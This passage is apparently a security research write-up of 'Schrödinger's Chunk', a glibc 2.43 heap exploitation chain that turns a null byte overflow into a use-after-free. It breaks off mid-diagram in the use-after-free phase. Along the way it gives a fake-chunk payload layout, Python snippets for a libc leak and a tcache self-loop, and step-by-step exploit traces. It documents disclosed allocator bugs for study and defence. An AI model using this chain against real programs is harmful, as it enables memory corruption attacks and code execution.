01

The starting position.

A single null byte. No use-after-free in the target. No double-free. Every mitigation the toolchain offers is active: Full RELRO, stack canary, NX, PIE. That is the starting position.

This post documents a heap exploitation technique we are calling Schrödinger's Chunk. The name captures the core primitive: a chunk that exists simultaneously in two states, allocated from the program's perspective and freed from the allocator's perspective. We manufacture this condition from nothing by chaining five bugs in glibc 2.43's own allocator code. The target program is correct. The bugs are in glibc.

The canonical entry point is a null byte overflow. But Schrödinger's Chunk is not tied to one primitive. Any corruption that creates overlapping chunk views, including uncontrolled out of bounds writes, weak single byte overwrites, or partial size corruptions, can serve as the entry point. We cover the full range of applicable primitives in a dedicated section before walking through the canonical exploit chain.

Verification

Every claim here is verified against the glibc 2.43.9000 source. All five bugs were reported to the glibc security team prior to this publication.

5 glibc bugs chained · 1 null byte to start · 0 UAFs in target program

02

What changed in glibc 2.43.

Understanding Schrödinger's Chunk requires understanding glibc 2.43 specifically. Several changes in this release shifted the attack surface in ways that are not immediately obvious.

Fastbins removed

glibc 2.43 removed fastbins entirely. Everything small now flows through either the tcache (fast path) or the full consolidation machinery (_int_free_merge_chunk). There is no middle layer. This makes the tcache the sole fast allocation path for small chunks. Any bug in the tcache now affects a much larger fraction of all program allocations.

Tcache expanded to 76 bins

The tcache grew from 64 size classes (up to 0x410) to 76: 64 small bins plus 12 large bins. TCACHE_SMALL_BINS = 64, TCACHE_LARGE_BINS = 12, TCACHE_MAX_BINS = 76. The tcache_perthread_struct expanded accordingly. It now holds uint16_t num_slots[76] (152 bytes) and tcache_entry *entries[76] (608 bytes), totaling 760 bytes.
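The size arithmetic can be checked with a small ctypes mirror of the struct. This is only a sketch under stated assumptions: a 64-bit target with 8-byte pointers, with `c_uint64` standing in for `tcache_entry *`. The class name `TcachePerthreadModel` is illustrative and is not a glibc definition.

```python
import ctypes

TCACHE_SMALL_BINS = 64
TCACHE_LARGE_BINS = 12
TCACHE_MAX_BINS = TCACHE_SMALL_BINS + TCACHE_LARGE_BINS


class TcachePerthreadModel(ctypes.Structure):
    """Illustrative mirror of tcache_perthread_struct (not the glibc source)."""
    _fields_ = [
        ("num_slots", ctypes.c_uint16 * TCACHE_MAX_BINS),
        # c_uint64 stands in for an 8-byte tcache_entry pointer (assumption).
        ("entries", ctypes.c_uint64 * TCACHE_MAX_BINS),
    ]


NUM_SLOTS_BYTES = ctypes.sizeof(ctypes.c_uint16 * TCACHE_MAX_BINS)
ENTRIES_BYTES = ctypes.sizeof(ctypes.c_uint64 * TCACHE_MAX_BINS)
STRUCT_BYTES = ctypes.sizeof(TcachePerthreadModel)

print(TCACHE_MAX_BINS, NUM_SLOTS_BYTES, ENTRIES_BYTES, STRUCT_BYTES)
```

Because the `num_slots` array ends on an 8-byte boundary, no padding is inserted before `entries`, so the two array sizes simply add.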

Lazy tcache initialization

This is the structurally important change. In glibc 2.35 the tcache_perthread_struct was allocated during the first malloc(). In glibc 2.43 it is allocated lazily, during the first free(). The trigger in __libc_free is:

c · malloc/malloc.c
if (__glibc_unlikely (tcache_inactive ()))
    return tcache_free_init (mem);

tcache_free_init calls tcache_init(NULL) (which calls __libc_malloc2 to allocate the struct) and then re-calls __libc_free on the original chunk. The heap layout consequence is deterministic:

layout · 2.35 vs 2.43
Early init (glibc 2.35):
  first malloc() → allocate tcache struct → allocate requested chunk

Lazy init (glibc 2.43):
  malloc() #1 → allocate chunk directly (no tcache yet)
  free()   #1 → allocate tcache struct via tcache_free_init → re-free chunk

Resulting layout:
  heap_base + 0x000:  first malloc chunk   (e.g. 0x20 for malloc(1))
  heap_base + 0x020:  tcache_perthread     (0x310)
  heap_base + 0x330:  second malloc chunk

Given any heap address leak, the address of every subsequent allocation is computable by arithmetic. This has a direct consequence for safe-linking.
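The "computable by arithmetic" claim amounts to a running sum of chunk sizes. A minimal sketch, assuming chunks are placed back to back in allocation order with no gaps; the helper name `chunk_offsets` and the third size in the example are hypothetical.

```python
def chunk_offsets(chunk_sizes):
    """Return each chunk's offset from heap base for back-to-back chunks."""
    offsets = []
    cursor = 0
    for size in chunk_sizes:
        offsets.append(cursor)
        cursor += size
    return offsets


# First two sizes come from the layout above; the third is an arbitrary example.
sizes = [0x20, 0x310, 0x90]
offsets = chunk_offsets(sizes)
print([hex(o) for o in offsets])
```

Adding a leaked heap base to any of these offsets gives the absolute chunk address under the same assumptions.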

Relaxed tcache free path

In __libc_free, when a freed chunk is tcache-eligible, glibc 2.43 takes an early return directly to tcache_put after only two checks: pointer alignment and tcache eligibility by size. The check_inuse_chunk call that existed on the tcache path in prior versions is gone. The size field is accepted as is as long as it falls within a valid tcache bin range. This is how size field corruption becomes exploitable on this version.

03

The allocator's bookkeeping.

Before diving into the bugs, here is the allocator state we are working with.

Chunks

Every heap allocation is a chunk. The header lives immediately before the user pointer and contains two 8 byte fields:

chunk layout · 64-bit
     chunk_ptr
         │
         ▼
    ┌───────────────────┐  ← chunk header
    │  prev_size  (8B)  │  only valid when prev chunk is free
    ├───────────────────┤
    │  size       (8B)  │  total chunk size | flags in low 3 bits
    ├───────────────────┤  ← user pointer (what malloc returns)
    │                   │
    │   user data       │
    │                   │
    └───────────────────┘

Bit 0 of size is PREV_INUSE: 1 means the preceding chunk is allocated, 0 means it is free. When PREV_INUSE is 0, prev_size is valid and tells the allocator how far back to walk to find the free predecessor.
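To make the flag encoding concrete, here is a small decoder for a raw size field. It is a sketch for illustration: the function name `decode_size_field` is hypothetical, while the three flag names follow glibc's macros for the low three bits.

```python
PREV_INUSE = 0x1
IS_MMAPPED = 0x2
NON_MAIN_ARENA = 0x4
SIZE_BITS = PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA


def decode_size_field(raw):
    """Split a raw size field into (chunk size, prev_inuse, is_mmapped, non_main_arena)."""
    return (
        raw & ~SIZE_BITS,            # chunk size with the flag bits masked off
        bool(raw & PREV_INUSE),
        bool(raw & IS_MMAPPED),
        bool(raw & NON_MAIN_ARENA),
    )


size, prev_inuse, is_mmapped, non_main_arena = decode_size_field(0x501)
print(hex(size), prev_inuse, is_mmapped, non_main_arena)
```

Writing a zero over the low byte of `0x501` yields `0x500`: the size is unchanged but PREV_INUSE now reads as clear.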

Tcache

c · struct tcache_entry
typedef struct tcache_entry {
    struct tcache_entry *next;   // safe-linked pointer to next free chunk
    uintptr_t key;               // double-free detection token
} tcache_entry;

num_slots[i] in tcache_perthread_struct counts how many additional entries bin i can still accept. It starts at mp_.tcache_count (default 7) for an empty bin. Each free to tcache decrements it. Each allocation from tcache increments it. The guard in __libc_free for accepting a chunk into tcache is num_slots[tc_idx] != 0.

Safe-linking

Since glibc 2.32, tcache next pointers are stored encoded:

c · safe-linking macros
#define PROTECT_PTR(pos, ptr) \
    ((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))

#define REVEAL_PTR(ptr)  PROTECT_PTR (&ptr, ptr)

PROTECT_PTR(pos, ptr) computes (pos >> 12) ^ ptr. The pos >> 12 component is the XOR key, derived from the pointer's own storage address. Because ASLR operates at page granularity (12 bits), this key contains only the randomized bits. Without knowing the storage address, you cannot compute the key to forge a next pointer. In theory.
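The same encoding can be modelled in a few lines of Python. This is a sketch of the arithmetic only; `protect_ptr` and `reveal_ptr` are illustrative names, and both addresses are made-up example values.

```python
def protect_ptr(pos, ptr):
    """Model of PROTECT_PTR: XOR the pointer with its storage address >> 12."""
    return (pos >> 12) ^ ptr


def reveal_ptr(pos, stored):
    """Model of REVEAL_PTR: the same XOR applied to the stored value."""
    return protect_ptr(pos, stored)


slot = 0x55555555B350     # hypothetical address of a next field
target = 0x55555555B3E0   # hypothetical pointer to store there

stored = protect_ptr(slot, target)
round_trip = reveal_ptr(slot, stored)
empty_list_value = protect_ptr(slot, 0)   # encoding of NULL is the key itself

print(hex(stored), hex(round_trip), hex(empty_list_value))
```

Because the operation is its own inverse, anyone who knows `slot` can both decode and forge the stored value.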

04

Five bugs in glibc 2.43.

We identified five defects in glibc 2.43's tcache implementation. Here they are in summary before showing how they connect.

Bug 1 · No cycle detection
Neither tcache_put_n nor tcache_get_n checks whether the list contains a cycle. A chunk whose next field decodes back to itself creates an infinite list. Every pop returns the same address. This is the foundation of Schrödinger's Chunk.

Bug 2 · Unbounded num_slots++
num_slots is a uint16_t. The logical maximum is 7. The increment in tcache_get_n has no bounds check. After two pops from a self-referencing loop the value reaches 8. The capacity guard (num_slots != 0) keeps accepting frees that should be rejected.

Bug 3 · Double-free gate bypassed
Double-free detection uses a fast key check (Stage 1) to gate a slow list walk (Stage 2). But tcache_get_n unconditionally clears e->key = 0 on every pop. After our double pop, key is 0. tcache_key is non-zero. Stage 1 fails. Stage 2 never runs.

Bug 4 · Deterministic lazy init
Because the tcache struct is always allocated during the first free(), and the first malloc() always lands at heap base, the layout is fixed. The safe-linking key for any chunk is addr >> 12. Pure arithmetic. No freed memory read needed.

Bug 5 · Unprotected bin heads
Chain link next fields use PROTECT_PTR. The entries[idx] head pointers in tcache_perthread_struct are stored raw. Any primitive reaching the tcache struct can redirect a bin head without computing a safe-linking key.

Load-bearing interaction
Bug 1 without Bug 2: no inflated counter to pass the capacity guard. Bug 1 without Bug 3: Stage 2 list walk finds the cycle and aborts. Bug 3 without Bug 1: no cleared key to exploit. None of these bugs is sufficient alone. The chain is multiplicative. Each is load-bearing.

Bug 1 in detail

tcache_put_n prepends a new chunk to its bin and decrements num_slots. tcache_get_n pops the head and increments num_slots. Neither function checks whether the linked list contains a cycle.

c · tcache_put_n (non-mangled path)
e->next = PROTECT_PTR (&e->next, *ep);   // store safe-linked next
*ep = e;                                  // set as new head (raw, no PROTECT_PTR)
--(tcache->num_slots[tc_idx]);

c · tcache_get_n (non-mangled path)
*ep = REVEAL_PTR (e->next);              // advance head
++(tcache->num_slots[tc_idx]);
e->key = 0;
return (void *) e;

Neither operation checks whether the chunk being inserted is already present in the list, or whether following next pointers from the new head eventually reaches NULL. A chunk whose next field decodes back to itself creates an infinite list. Without the ability to create a cycle, we cannot get malloc to return the same address twice. No duplicate address means no two independent handles to the same memory. No two handles means no manufactured UAF.
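The effect of a missing cycle check can be seen in a toy model of a single bin. This is a simplified sketch, not glibc code: `ToyBin` keeps encoded next fields in a dictionary, `0` plays the role of NULL, and the address `E` is a made-up example. The direct assignment to `memory[E]` stands in for whatever corruption rewrites the next field.

```python
class ToyBin:
    """Toy model of one tcache bin: a raw head plus safe-linked next fields."""

    def __init__(self):
        self.head = 0        # 0 plays the role of NULL
        self.memory = {}     # address -> stored (encoded) next field

    def put(self, addr):
        # Mirrors the put path: encode the old head, then make addr the head.
        self.memory[addr] = (addr >> 12) ^ self.head
        self.head = addr

    def get(self):
        # Mirrors the get path: decode next and advance the head, no cycle check.
        addr = self.head
        if addr == 0:
            return None
        self.head = (addr >> 12) ^ self.memory[addr]
        return addr


E = 0x55555555B350           # hypothetical chunk user address
toy = ToyBin()
toy.put(E)
toy.memory[E] = (E >> 12) ^ E   # next now decodes back to E itself

first = toy.get()
second = toy.get()
print(hex(first), hex(second), hex(toy.head))
```

Both pops return the same address and the head still points at `E` afterwards, which is the behaviour the text describes as an infinite list.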

Bug 3 in detail

glibc's double-free detection uses two stages.

Stage 1 (fast gate) in __libc_free

c · the fast gate
if (__glibc_unlikely (e->key == tcache_key))
    return tcache_double_free_verify (e);

Stage 2 (list walk) in tcache_double_free_verify

c · the slow scan
for (size_t tc_idx = 0; tc_idx < TCACHE_MAX_BINS; ++tc_idx) {
    size_t cnt = 0;
    for (tmp = tcache->entries[tc_idx]; tmp;
         tmp = REVEAL_PTR(tmp->next), ++cnt) {
        if (cnt >= mp_.tcache_count)
            malloc_printerr ("free(): too many chunks detected in tcache");
        if (tmp == e)
            malloc_printerr ("free(): double free detected in tcache 2");
    }
}

The list walk scans every tcache bin for the chunk being freed. With a self-referencing loop, tmp would equal e on the very first iteration. Stage 2 would catch it immediately.

But Stage 2 only runs when the Stage 1 key comparison matches. The problem is what tcache_get_n does on every pop: e->key = 0. The key is unconditionally cleared on every allocation. After our double pop from the self-referencing loop, the chunk's key is 0. When we re-free the chunk, the Stage 1 check evaluates (0 == tcache_key) as false, so Stage 2 never runs and the list walk that would have caught the double-free does not execute.
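The gating logic reduces to one comparison, which a toy model makes explicit. This sketch only models the key field: `ToyEntry`, `toy_put`, `toy_get`, and `gate_runs_list_walk` are hypothetical names, and `TCACHE_KEY` is a random nonzero stand-in for glibc's `tcache_key`.

```python
import secrets

# Nonzero stand-in for the per-process tcache_key (assumption for the model).
TCACHE_KEY = secrets.randbits(64) | 1


class ToyEntry:
    def __init__(self):
        self.key = 0


def toy_put(entry):
    """Free path: the entry is stamped with the key."""
    entry.key = TCACHE_KEY


def toy_get(entry):
    """Pop path: the key is cleared unconditionally."""
    entry.key = 0


def gate_runs_list_walk(entry):
    """Stage 1: the list walk is only reached when the key matches."""
    return entry.key == TCACHE_KEY


entry = ToyEntry()
toy_put(entry)
walk_on_immediate_refree = gate_runs_list_walk(entry)
toy_get(entry)
walk_after_pop = gate_runs_list_walk(entry)
print(walk_on_immediate_refree, walk_after_pop)
```

A chunk freed twice in a row still carries the key and reaches the list walk; a chunk that was popped in between does not.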

05

Entry points and primitives.

Schrödinger's Chunk requires one thing from the bug in your target: an overlapping chunk, a situation where one live, program-visible handle and one allocator-visible free chunk reference the same physical memory. Once you have that, the rest of the chain (self-referencing loop, schr allocation, manufactured UAF, tcache poison) runs from glibc's own bugs.

What overlap means concretely

Program view: "M is live, I can read and write through it."

Allocator view: "M is free, it is in a bin."

Reading through the program handle reads allocator metadata. Writing through it corrupts allocator metadata. Any corruption path that leaves these two views inconsistent is sufficient. The five glibc bugs do not care how the overlap was created.

Path A · Null byte overflow (canonical)

Bug class: off-by-one null byte write past a heap buffer.

Mechanism: the null byte at buf[n] lands on byte 0 of the adjacent chunk's size field, clearing PREV_INUSE (bit 0). When that adjacent chunk is freed, the allocator walks backward by prev_size bytes, finds a fake free chunk we constructed in our live buffer, passes the self-pointing unlink check, and merges. The merged chunk goes into the unsorted bin, but our live handle still covers that same memory.

mechanics · path A
Before:
  ┌──────────────────┬──────────────────┐
  │  [prev]  0x510   │  [victim] 0x500  │
  │  in use          │  PREV_INUSE=1    │
  └──────────────────┴──────────────────┘

After null byte at offset 0x508 (clears victim's PREV_INUSE):
  ┌──────────────────┬──────────────────┐
  │  [prev]  0x510   │  [victim] 0x500  │
  │  in use          │  PREV_INUSE=0 ←  │
  └──────────────────┴──────────────────┘

After free(victim):
  ┌────────────────────────────────────────────────────────────┐
  │  [merged]  0xA00   in unsorted bin                         │
  │                                                            │
  │  prev handle still valid → overlap achieved                │
  └────────────────────────────────────────────────────────────┘
Path A mechanics · deterministic when layout conditions are met

Path B · Uncontrolled out of bounds write

Bug class: an OOB write where the position is attacker controlled (or predictable) but the bytes written are not. Typical sources are audio data, network payload echoes, timer values, or any other structured host-provided content.

Mechanism: glibc 2.43's __libc_free on the tcache path performs essentially no size field validation. If we can corrupt the low byte of an adjacent chunk's size field, we can make the allocator believe the chunk is a different size than it actually is. We then free that chunk and it enters the wrong tcache bin. When we reclaim from that bin we get a chunk that is "larger" than the actual allocation, overlapping the chunk after it.

Path C · Controlled single byte write

Bug class: an arbitrary single byte write, one byte, attacker chosen value, attacker chosen address.

With one controlled byte you can write any value to byte 0 of a target chunk's size field. This gives full control over the low byte, allowing deterministic corruption to a specific larger size (e.g., 0x200 → 0x280). The rest of the path is identical to Path B, but deterministic rather than retry based. This is the strongest single byte variant.

Path D · Multi-byte overflow with partial control

An overflow where some bytes are attacker controlled and others are not. The more bytes of control you have, the more flexibility you gain in choosing the target size class and the consolidation distance.

Path E · Use-after-free with write capability

A real UAF in the target program. With a dangling pointer to a freed chunk, creating the overlap is direct. Schrödinger's Chunk augments this path by enabling the self-referencing loop and the double-pop UAF manufacture, potentially turning a one-shot tcache poison into a persistent UAF primitive.

Entry                    Bytes controlled            Mechanism                                   Reliability
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
Null byte overflow       0 (always \x00)             PREV_INUSE clear → backward consolidation   Deterministic
Uncontrolled OOB         0 (data dependent)          Size field corruption → wrong tcache bin    Retry based (~44%)
Controlled single byte   1 byte, chosen              Size field corruption → wrong tcache bin    Deterministic
Multi-byte partial       Partial                     Size + prev_size corruption                 Varies
Real UAF                 Full write to freed chunk   Direct tcache entry corruption              Depends on heap leak

For all paths, once the overlap exists, Bugs 1 through 4 are the mechanism for manufacturing the use-after-free, defeating safe-linking without a freed memory read, and bypassing double-free detection. The entry point only determines how you get to the overlap. The downstream chain is the same.

06

The uncontrolled write case.

The uncontrolled case deserves deeper treatment because it is the most common class of real-world memory corruption. Many vulnerabilities in device emulators, network protocol handlers, and audio or video pipelines produce out of bounds writes where the attacker controls how many bytes overflow but not what they contain.

The question is: how do you reason about a corruption primitive when you do not know the bytes?

Frame it as a search problem

You need the corrupted low byte of the size field to satisfy:

  • (byte & 0x0F) == 0 (16 byte alignment, mandatory)
  • (byte & 0x02) == 0 (IS_MMAPPED clear, otherwise abort)
  • byte != 0x00 (zero means PREV_INUSE clear and size shrinks)
  • The resulting full size falls within a valid tcache bin range

Across the 256 possible byte values, roughly 112 (about 44%) satisfy all constraints and produce a valid tcache-eligible size. For a uniformly random byte, the probability per attempt is approximately 44%.

In practice, data is not uniformly random. For audio (u8 PCM silence is 0x80), the distribution clusters around 0x80 = 0b10000000. 0x80 & 0x0F == 0 (aligned), 0x80 & 0x02 == 0 (not IS_MMAPPED). This is a valid byte. For ALSA audio data during quiet periods, the dominant byte value directly satisfies the constraints, making reliability very high.
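The byte-level part of that filter is easy to express as a predicate. The sketch below encodes only the first three constraints from the list, exactly as written; the fourth (the resulting full size landing in a tcache bin range) depends on the upper bytes of the size field and is not modelled. The name `low_byte_passes` is hypothetical.

```python
def low_byte_passes(byte):
    """Apply the three byte-level constraints to one candidate low byte."""
    aligned = (byte & 0x0F) == 0       # low nibble clear
    not_mmapped = (byte & 0x02) == 0   # IS_MMAPPED clear
    nonzero = byte != 0x00             # zero would shrink the size
    return aligned and not_mmapped and nonzero


U8_PCM_SILENCE = 0x80
silence_ok = low_byte_passes(U8_PCM_SILENCE)
print(silence_ok)
```

Feeding the predicate a histogram of observed overflow bytes gives a quick estimate of how often a given data source would pass these three checks.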

Retry loop structure

  1. Heap spray: build layout of repeated same size chunks.
  2. Create holes by freeing alternating chunks.
  3. Allocate overflowing buffer into a hole.
  4. Let overflow occur (one attempt).
  5. Check: did we get a useful size corruption? Try allocating from the expected target bin. If it returns a chunk that overlaps our spray region, success. If not, free the buffer, refill the hole, return to step 3.
  6. On success, proceed with the overlap.

The retry adds allocation noise. To prevent that noise from disrupting the heap layout, the spray and hole structure should be built with enough redundancy that a few failed attempts do not destroy the geometry.
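How much redundancy "enough" means can be estimated from the per-attempt probability. A rough sketch, assuming attempts are independent and taking the roughly 44% figure quoted above as given; the function names are illustrative.

```python
import math


def success_within(p, attempts):
    """Probability of at least one success in the given number of attempts."""
    return 1.0 - (1.0 - p) ** attempts


def attempts_needed(p, confidence):
    """Smallest attempt count whose cumulative success reaches the confidence."""
    if not (0.0 < p < 1.0 and 0.0 < confidence < 1.0):
        raise ValueError("p and confidence must lie strictly between 0 and 1")
    return math.ceil(math.log(1.0 - confidence) / math.log(1.0 - p))


P_PER_ATTEMPT = 0.44   # per-attempt estimate from the text, taken as given
budget = attempts_needed(P_PER_ATTEMPT, 0.99)
print(budget, round(success_within(P_PER_ATTEMPT, budget), 4))
```

Under these assumptions the spray needs to survive about eight attempts to reach 99% cumulative success; a data source with a more favourable byte distribution would need fewer.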

07

Initial heap layout.

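The technique begins with three allocations (prev, victim, and barrier) made once the first malloc() and first free() have fixed the taste chunk and the tcache struct in place: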

layout · post-startup
┌────────────────────────────────────────────────────────────────────────┐
│  heap_base + 0x000                                                      │
├────────────────────────────────────────────────────────────────────────┤
│  [taste]   0x20    ← first malloc() before tcache exists               │
├────────────────────────────────────────────────────────────────────────┤
│  [tcache]  0x310   ← allocated by tcache_free_init() on first free()   │
│                                                                         │
│  num_slots[i]  = 7  for all i  (mp_.tcache_count, all slots available) │
│  entries[i]    = NULL  for all i                                        │
├────────────────────────────────────────────────────────────────────────┤
│  [prev]    0x510   ← source of the null byte overflow (0x508 usable)   │
├────────────────────────────────────────────────────────────────────────┤
│  [victim]  0x500   ← consolidation target                              │
├────────────────────────────────────────────────────────────────────────┤
│  [barrier] 0x90    ← prevents top-chunk merge when victim is freed     │
├────────────────────────────────────────────────────────────────────────┤
│  [top]     ...                                                          │
└────────────────────────────────────────────────────────────────────────┘
Initial heap · deterministic by Bug 4

The layout is deterministic (Bug 4). prev's chunk header starts at heap_base + 0x330, so its user pointer is heap_base + 0x340. We know this from the heap leak alone. No UAF needed, no guessing.

The null byte primitive: writing 0x508 bytes to prev and appending a null terminator writes \x00 at prev_user + 0x508. This address is exactly byte 0 of victim's size field. Since PREV_INUSE is bit 0 of size, this single null byte clears it.
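The offset can be double-checked from the chunk geometry described earlier. A small sketch, assuming 8-byte header fields and an in-use chunk that may use the following chunk's prev_size slot; the helper names and the example address are hypothetical.

```python
SIZE_SZ = 8             # width of one header field on 64-bit
HEADER = 2 * SIZE_SZ    # prev_size + size


def usable_size(chunk_size):
    """Usable bytes of an in-use chunk, including the next chunk's prev_size slot."""
    return chunk_size - SIZE_SZ


def next_size_field(user_ptr, chunk_size):
    """Address of the size field belonging to the chunk that follows."""
    chunk_ptr = user_ptr - HEADER
    return chunk_ptr + chunk_size + SIZE_SZ


prev_user = 0x1000      # arbitrary example address
PREV_CHUNK_SIZE = 0x510

terminator_addr = prev_user + usable_size(PREV_CHUNK_SIZE)
victim_size_addr = next_size_field(prev_user, PREV_CHUNK_SIZE)
print(hex(usable_size(PREV_CHUNK_SIZE)), terminator_addr == victim_size_addr)
```

The byte just past the usable area and the low byte of the next size field are the same address, which is why a single terminator is enough.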

08

Phase 1 · Backward consolidation.

Clearing PREV_INUSE on victim tells the allocator the preceding chunk is free when victim is freed. We need four things to be true for the consolidation to proceed without crashing.

  1. victim->prev_size must point back to a valid fake chunk
  2. That fake chunk must have a consistent size field
  3. The unlink integrity check (fd->bk == p && bk->fd == p) must pass
  4. The size consistency checks must pass

We satisfy all four by writing into prev's data area:

payload · prev user area
offset    value      meaning
───────────────────────────────────────────────────────────
+0x00     (any)      fake chunk's prev_size (not checked)
+0x08     0x501      fake chunk's size: 0x500 | PREV_INUSE=1
+0x10     prev_user  fake fd = self
+0x18     prev_user  fake bk = self
 ...      (any)
+0x500    0x500      victim's prev_size field
+0x508    \x00       ← null byte clears victim's PREV_INUSE

The fake chunk's chunk pointer is prev_user. We treat prev_user + 0x00 as prev_size and prev_user + 0x08 as size. Its size is 0x500.

Unlink check (fd->bk == p && bk->fd == p): with fd = bk = prev_user = p, both checks become p->bk == p and p->fd == p. True. The unlink runs and is a harmless no-op.

Size consistency checks in unlink_chunk and _int_free_merge_chunk both pass because chunksize(fake) = 0x500 equals victim->prev_size = 0x500.
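The two comparisons named above can be replayed on a simulated memory map. This is a sketch that models only those comparisons (size against prev_size, and the fd/bk self-pointing test), not every check glibc performs; `consolidation_checks_pass` and the address `P` are hypothetical.

```python
def consolidation_checks_pass(mem, p, victim_prev_size):
    """Replay the size and unlink comparisons for a fake chunk at address p."""
    size = mem[p + 0x08] & ~0x7          # chunksize(fake), flag bits masked
    fd = mem[p + 0x10]
    bk = mem[p + 0x18]
    size_ok = size == victim_prev_size
    # fd->bk lives at fd + 0x18 and bk->fd at bk + 0x10.
    unlink_ok = mem.get(fd + 0x18) == p and mem.get(bk + 0x10) == p
    return size_ok and unlink_ok


P = 0x2000                               # arbitrary stand-in for prev_user
memory = {
    P + 0x08: 0x501,                     # fake size with PREV_INUSE set
    P + 0x10: P,                         # fake fd = self
    P + 0x18: P,                         # fake bk = self
}
self_pointing_ok = consolidation_checks_pass(memory, P, 0x500)

broken = dict(memory)
broken[P + 0x10] = 0x3000                # fd no longer points back at the chunk
foreign_fd_ok = consolidation_checks_pass(broken, P, 0x500)
print(self_pointing_ok, foreign_fd_ok)
```

With fd and bk both equal to the chunk's own address, each lookup lands back on a field that holds that address, so the test is satisfied trivially.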

When victim is freed, _int_free_merge_chunk runs:

trace · _int_free_merge_chunk
Step 1: victim->size has PREV_INUSE=0  ← cleared by null byte
Step 2: read victim->prev_size = 0x500
Step 3: p = chunk_at_offset(victim, -0x500) = prev_user
Step 4: chunksize(fake) == prevsize  → 0x500 == 0x500  ✓  no abort
Step 5: unlink_chunk(fake)  → self-pointing passes check  ✓  no-op
Step 6: merged chunk at prev_user, size 0x500+0x500=0xA00
Step 7: insert into unsorted bin

The result:

state · post consolidation
Memory at prev_user (post-consolidation):

  ┌──────────────────────────────────────────────────────────────┐
  │  merged chunk (0xA00)  ·  in unsorted bin                    │
  │                                                              │
  │  prev_user+0x00:  prev_size                                  │
  │  prev_user+0x08:  size = 0xA01 (PREV_INUSE set)              │
  │  prev_user+0x10:  fd → main_arena+0x08  ← libc pointer       │
  │  prev_user+0x18:  bk → main_arena+0x08                       │
  │  ...                                                         │
  └──────────────────────────────────────────────────────────────┘
        ▲
        │  prev entry in program's tracking table still points here
        │  program believes prev is a live 0x508-byte allocation
        │  we can read and write through it
State

Overlap established. The allocator owns this memory as a free chunk. The program thinks prev is a live allocation.

09

Phase 2 · Libc leak.

The merged chunk is the only entry in the unsorted bin. The unsorted bin is a circular doubly linked list rooted in main_arena. A lone entry has fd = bk = main_arena + 0x08. These pointers sit at prev_user + 0x10 and prev_user + 0x18, inside our overlap region.

python · libc leak
data = show(prev)
unsorted_fd = unpack64(data[0x10:0x18])
libc_base = unsorted_fd - (main_arena_offset + 0x08)

Libc base acquired. No additional primitive required.

10

Phase 3 · Self-referencing tcache loop.

We carve a small chunk from the merged region:

alloc · from unsorted
malloc(0x88) carved from merged chunk:
  E at prev_user + 0x10  (unsorted bin allocates from the front)

After free(E):
  tcache[0x90]:  head → E
  E->next = PROTECT_PTR(&E->next, NULL) = E_user >> 12
  num_slots[0x90] = 6

Now Bug 4: the layout is deterministic, so we know E_user = prev_user + 0x10. We compute:

python · compute the key
safe_key  = E_user >> 12
self_loop = safe_key ^ E_user     # = PROTECT_PTR(E_user, E_user)

No reading from freed memory. Pure arithmetic.

Through the overlap we overwrite E->next (at prev_user + 0x10) with self_loop:

python · write through overlap
# E_user = prev_user + 0x10
# E->next field is at E_user + 0x00 = prev_user + 0x10
struct.pack_into("<Q", overlap_buf, 0x10, self_loop)
edit(prev, overlap_buf)

Verification:

math · REVEAL_PTR
REVEAL_PTR(E->next)
  = PROTECT_PTR(&E->next, E->next)
  = (E_user >> 12) ^ ((E_user >> 12) ^ E_user)
  = E_user   ← loop back to E

The bin head never advances:

state · infinite tcache
tcache[0x90]:

  head
   │
   ▼
  ┌──────────────┐
  │      E       │
  │  next ───────┼──► (decodes to E_user)
  └──────────────┘
        ▲    │
        └────┘
           ∞

Every pop returns E_user. The list is infinite.

11

Phase 4 · Schr allocation.

Two consecutive pops from the infinite bin:

python · double pop
A = malloc(0x88)   # returns E_user
B = malloc(0x88)   # returns E_user again

The program's tracking table now has:

state · two handles, one chunk
┌─────────────────────────────────────────────────────────────┐
│  tracking_table[A]:  data = E_user,  in_use = 1             │
│  tracking_table[B]:  data = E_user,  in_use = 1             │
│                              ▲                              │
│                              └── same physical memory       │
└─────────────────────────────────────────────────────────────┘

Two independent entries. One chunk. And the num_slots overflow:

trace · num_slots progression
Initial state:       num_slots[0x90] = 7
After free(E):       num_slots[0x90] = 6
After pop A:         num_slots[0x90] = 7
After pop B:         num_slots[0x90] = 8   ← exceeds mp_.tcache_count

The counter now claims there are 8 available slots. The logical maximum is 7. No bounds check prevented this (Bug 2). The inflated count will shortly allow a free to go through that should be rejected.
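The progression, and the effect of the clamp proposed later in the bug summary, can be replayed with a small counter model. This is a sketch of the bookkeeping only: `run_counter` is a hypothetical helper, and it does not model the capacity guard rejecting a free when the counter is zero.

```python
TCACHE_COUNT = 7   # default mp_.tcache_count


def run_counter(ops, clamp=False):
    """Replay 'free' and 'pop' operations against a num_slots-style counter."""
    slots = TCACHE_COUNT
    trace = [slots]
    for op in ops:
        if op == "free":
            slots -= 1
        elif op == "pop":
            slots += 1
            if clamp:
                # Models the proposed fix: never exceed the configured count.
                slots = min(slots, TCACHE_COUNT)
        else:
            raise ValueError(f"unknown operation: {op}")
        trace.append(slots)
    return trace


unclamped = run_counter(["free", "pop", "pop"])
clamped = run_counter(["free", "pop", "pop"], clamp=True)
print(unclamped, clamped)
```

One free followed by two pops is only possible when the list hands out the same entry twice, which is why the unclamped trace ends above the configured maximum.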

12

Phase 5 · Manufacturing the use-after-free.

Current state:

state · pre re-free
tracking_table[A]:  data = E_user,  in_use = 1
tracking_table[B]:  data = E_user,  in_use = 1
tcache[0x90]:  head → E → E → E → ...   (self-loop)
E->key = 0   ← cleared by both pops in tcache_get_n

We free A:

trace · free(A) → re-free
free(tracking_table[A].data):
  p = E_user
  e = (tcache_entry *) E_user

  Stage 1 gate: (e->key == tcache_key)
              = (0 == random_nonzero)
              = false  ← Bug 3 bypasses Stage 2

  tcache_double_free_verify: NEVER CALLED

  Guard: (num_slots[0x90] != 0) = (8 != 0) = true  ← Bug 2 enables this

  tcache_put(E):
    e->key = tcache_key   (chunk marked as in-tcache)
    E->next = PROTECT_PTR(E, head)  (points to current head = E_user)
    head = E_user
    num_slots[0x90] = 7

tracking_table[A]:  data = NULL,  in_use = 0   ← program cleans up A
tracking_table[B]:  data = E_user, in_use = 1  ← B untouched

The state after free(A):

state · the paradox
Physical memory at E_user:

  ┌────────────────────────────────────────────────────────────┐
  │  Allocator view:  tcache[0x90] head → THIS chunk           │
  │    E->next = some encoded pointer                          │
  │    E->key  = tcache_key                                    │
  │                                                            │
